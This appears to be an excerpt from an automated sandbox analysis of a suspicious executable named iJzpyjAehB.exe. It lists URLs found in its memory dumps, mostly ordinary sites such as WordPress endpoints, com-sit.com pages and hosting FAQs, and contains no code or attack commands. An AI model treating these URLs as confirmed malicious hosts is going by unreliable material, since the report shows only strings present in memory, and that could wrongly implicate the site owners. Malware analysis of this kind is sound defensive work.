                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2F
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2F&#038;format=xml
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-json/wp/v2/pages/158
                      Source: svchost.exe, 00000016.00000003.496913823.000000000332A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rp.zemanta.com/static/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://s.rankmath.com/home
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://schema.org
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.473713643.0000000005150000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.478763378.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://schema.org/WebPage
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.277655494.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sjbs.org/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438940303.0000000003090000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.267669316.0000000008D00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.414643624.0000000000A60000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.271358037.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://static.minne.com/files/banner/minne_600x500
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.267669316.0000000008D00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.414643624.0000000000A60000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.271358037.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.lolipop.jp/hc/ja/articles/360049132953
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.272483964.0000000008700000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.277227725.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.423509233.0000000000A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tickets.suresupport.com/faq/article-1596/en
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429302770.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434048283.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431188888.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429996077.0000000005580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431935732.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.GPSENKE.com
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278369986.0000000008700000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aevga.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431845240.0000000008800000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.c9dd.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.268618065.0000000008700000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.271358037.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.277227725.0000000003570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com?utm_source=challenge&utm_campaign=m
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/branchen-know-how/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.473713643.0000000005150000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.478763378.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/comments/feed/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/datenschutz/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/download/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/en/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/es/
